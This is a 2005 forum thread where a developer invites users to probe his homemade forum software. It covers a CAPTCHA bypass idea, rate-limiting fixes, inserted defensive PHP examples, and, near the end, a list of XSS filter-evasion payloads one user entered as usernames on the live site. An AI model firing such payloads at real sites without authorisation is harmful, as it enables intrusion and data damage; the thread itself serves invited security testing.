RE: Hacking a Homemade forum..
Posted on 21-11-05 01:43
Okay, I found a possible exploit. The "anti-bot" system you have on the signup forums doesn't work. A bot could easily bypass that because of the fact that the anti-bot codes end up in the source of the webpage in raw data. Let me explain this exploit.

Let's say someone creates a bot program to, for whatever reason, create a large amount of accounts. Let's say thousands in an attempt to flood your server.

Example (theory):

This is pure theory. I have not tested it; it is based on my knowledge.

A bot program connects to port 80 and uses the GET method to return HTML for the register page. The bot then reads the returned data (the HTML source of that page) and because the generated anti-bot codes are posted on the page source in regular string format (raw, text, whatever you want to call it), it can simply get the anti-bot codes right off the returned data! It can then input the rest of the data (e-mail, user, password, etc.) and use the returned anti-bot codes to submit it.

In simple words, the anti-bot codes are visible in the source of the webpage... Which in theory (based on my knowledge), can be exploited.

Please anyone correct me if I have made any mistakes or have explained anything poorly.

Hope this helps!

P.S. I also suggest you only have one anti-bot input. It would make it look a little more professional.

Edited by on 21-11-05 02:59
RE: Hacking a Homemade forum..
Posted on 21-11-05 03:02
I have known about this "exploit" for a while ;). I just said that to code in GD and advanced PHP image codes is very complex :). I will do it later in development, as the board is nowhere near complete. If you can't find any other "exploits" then woot!
RE: Hacking a Homemade forum..
Posted on 21-11-05 03:13
I don't know how many people have figured out the Admin Control Center's location, but: http://www.programmer-scripts.com/NextGenBoard/ACC/
Hack it :P. Try and do something :)
Oh dear! The documentation is here:
http://www.programmer-scripts.com/Document1/

Yeah. The D is capital. Forum screwing up..
Sorry :)

Edited by on 21-11-05 03:23
RE: Hacking a Homemade forum..
Posted on 21-11-05 03:42
Ah yes, it is. Hmmm, just an idea. This may lighten things up a bit, because I cannot disagree with you when you say it is complex.

What if you had a PHP script that displayed an image and set a variable for the anti-bot code... Then for each image loaded there would be a different code, and it would check the string variable that was assigned when the image was loaded and compare it to the input field.

For example:

AD426CKE5.gif : code=5c532f84m4a
DVCV1CA52.gif : code=v367svr63adv

And so on...

So if it randomly set AD426CKE5.gif as the image for the anti-bot code, the picture would display the text "5c532f84m4a" and check to make sure the user has entered that text in the input field. Make sure the image file name and the actual text it displays (anti-bot code too) are different, or the bot could "leech" right off the file name itself!

Just an idea.

Hope this helps as well!

Edited by on 21-11-05 03:45
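
A minimal server-side version of the scheme discussed in the posts above, as an added example that is not part of the thread or of NextGenBoard's code: the page receives only a random challenge id, the answer stays on the server, and every id is good for one attempt. The `ChallengeStore` class and the `captcha.php` endpoint name are hypothetical; the in-memory array stands in for a session or database table, and drawing the text with GD is left out.

```php
<?php
// Added example (not NextGenBoard code). Requires PHP 8.
// The answer never leaves the server; the form carries only an unrelated id.
final class ChallengeStore
{
    /** @var array<string, array{answer: string, expires: int}> */
    private array $rows = [];   // stands in for a session or DB table (assumption)

    public function __construct(private int $ttl = 300) {}

    /** Returns [id to embed in the form, text the image script should draw]. */
    public function issue(int $now): array
    {
        $alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZ';   // letters only, no look-alike I/O
        $answer = '';
        for ($i = 0; $i < 6; $i++) {
            $answer .= $alphabet[random_int(0, strlen($alphabet) - 1)];
        }
        $id = bin2hex(random_bytes(16));          // generated independently of the answer
        $this->rows[$id] = ['answer' => $answer, 'expires' => $now + $this->ttl];
        return [$id, $answer];
    }

    /** Single use: the row is deleted on every attempt, right or wrong. */
    public function verify(string $id, string $input, int $now): bool
    {
        $row = $this->rows[$id] ?? null;
        unset($this->rows[$id]);
        if ($row === null || $now > $row['expires']) {
            return false;
        }
        return hash_equals($row['answer'], strtoupper(trim($input)));
    }
}

// Constructed walk-through; captcha.php is a hypothetical image endpoint.
$store = new ChallengeStore();
[$id, $answer] = $store->issue(time());
$html = '<img src="captcha.php?c=' . $id . '">'
      . '<input type="hidden" name="c" value="' . $id . '">';
echo 'answer present in markup: ', var_export(str_contains($html, $answer), true), "\n";
echo 'wrong guess accepted:     ', var_export($store->verify($id, 'WRONG1', time()), true), "\n";
echo 'same id reused:           ', var_export($store->verify($id, $answer, time()), true), "\n";
[$id2, $answer2] = $store->issue(time());
echo 'fresh id, correct answer: ', var_export($store->verify($id2, strtolower($answer2), time()), true), "\n";
```

Because a failed guess burns the challenge, a bot that "keeps trying" has to fetch a new image for every attempt instead of iterating over one code.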
RE: Hacking a Homemade forum..
Posted on 21-11-05 03:49
The actual method I would be using is that the GD image has random amounts of characters. Then each character is inputted into the standard "Images/GD.gif", and then they are outputted. Then the possibility is assigned to a variable, and the variable is set into a database. Then the next page checks if the variable, the field, and if the user inputted is the same :). Some bots are made to keep trying :P They could be easily coded to repeat until one possibility is listed.
RE: Hacking a Homemade forum..
Posted on 21-11-05 03:55
Ah, that's true. You could make some kind of thing that limits the logins per minute. You know, that kind of thing. ;) Or you can make it so 3 wrong passwords and you have to wait three minutes before logging in again. Anything like that should stop, if not cripple in some way, a bot.

Edited by on 21-11-05 04:01
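
The lockout suggested in the post above (3 wrong passwords, then a three-minute wait), as an added example that is not part of the thread or of NextGenBoard's code. `LoginThrottle`, the key format and the 10-minute counting window are assumptions; the array stands in for a database table.

```php
<?php
// Added example (not NextGenBoard code). Requires PHP 8.
// After 3 failures inside the window, the key is locked for 180 seconds.
final class LoginThrottle
{
    /** @var array<string, array{fails: int, first: int, until: int}> */
    private array $rows = [];   // stands in for one small DB table (assumption)

    public function __construct(
        private int $maxFails = 3,
        private int $lockSeconds = 180,
        private int $window = 600,      // failures older than this are forgotten
    ) {}

    /** Seconds the caller must still wait; 0 means an attempt is allowed. */
    public function retryAfter(string $key, int $now): int
    {
        return max(0, ($this->rows[$key]['until'] ?? 0) - $now);
    }

    public function recordFailure(string $key, int $now): void
    {
        $row = $this->rows[$key] ?? ['fails' => 0, 'first' => $now, 'until' => 0];
        if ($now - $row['first'] > $this->window) {       // stale streak: start over
            $row = ['fails' => 0, 'first' => $now, 'until' => 0];
        }
        if (++$row['fails'] >= $this->maxFails) {         // lock and reset the counter
            $row = ['fails' => 0, 'first' => $now, 'until' => $now + $this->lockSeconds];
        }
        $this->rows[$key] = $row;
    }

    /** A correct password clears the record, which also keeps the table small. */
    public function recordSuccess(string $key): void
    {
        unset($this->rows[$key]);
    }
}

// Constructed attempts (seconds since the first try); every password is wrong.
$throttle = new LoginThrottle();
$key = 'alice|203.0.113.7';     // account + client address, constructed values
foreach ([0, 5, 10, 15, 200] as $now) {
    $wait = $throttle->retryAfter($key, $now);
    if ($wait === 0) {
        $throttle->recordFailure($key, $now);   // password was checked and rejected
    }
    echo "t={$now}s ", $wait === 0 ? 'password checked' : "blocked, retry in {$wait}s", "\n";
}
```

Keying on account plus client address keeps one client's failures from locking the account for everyone else, at the cost of letting a bot spread its guesses over many addresses.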
RE: Hacking a Homemade forum..
Posted on 21-11-05 04:04
Yah, I agree, and that isn't *too* heavy on coding for me :). But I want to keep this forum from blubbering to death :P. So that means I have to NOT make the databases huge. Then again, when this entire forum is "Done", it will become a Beta :P. Then I have to add, delete, correct, modify, and all that fun stuff to the code :)
RE: Hacking a Homemade forum..
Posted on 26-11-05 20:42
Major update. Change themes, etc.! Then you can also make a thread. thread.php is in the works, and soon beta one will be up!

Almost here everyone! I need someone to actually try and hack it! I am updating everything, but it might be a while! Code is becoming commented, and I need you to hack it!
RE: Hacking a Homemade forum..
Posted on 27-11-05 01:33
Working on it, undercovernoob ;) All those login requests are probably me nailing your login :P


RE: Hacking a Homemade forum..
Posted on 27-11-05 02:22
I managed to delete a few user accounts, by inputting a load of XSS attempts, profile.php?id= doesn't go over 11 any more, even though there are more.


RE: Hacking a Homemade forum..
Posted on 27-11-05 02:33
WilleH, I'm not sure what you mean.

Explain the XSS you used, as it wouldn't exactly be XSS if you're deleting SQL data.


RE: Hacking a Homemade forum..
Posted on 27-11-05 02:39
I tried loads of XSS variants including:

';alert('XSS')//\';alert('XSS')//";alert('XSS')//\";alert('XSS')//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=%26{}
<SCRIPT>alert("XSS")</SCRIPT>
\";alert('XSS');//
<META HTTP-EQUIV="refresh" CONTENT="0;url=nojavascript...alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=nojavascript...alert('XSS');>

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>


I know these aren't SQL commands, but somehow one of these or some of the others I tried has screwed something up, because after I register with some of these as usernames I'm not given a user ID.

Go to: http://www.programmer-scripts.com/NextGenBoard/index.php then it shows the newest user, click on it, the profile?id= doesn't contain a value, as if I've not been given an ID. It says they have 18 users, yet there aren't any ?id= over 11. I registered with an account called willeh and my id was over 11, and I could view my profile. But, after I entered some of the above combinations I was then unable to.

Just some thoughts,

Will.




Edited by on 27-11-05 02:44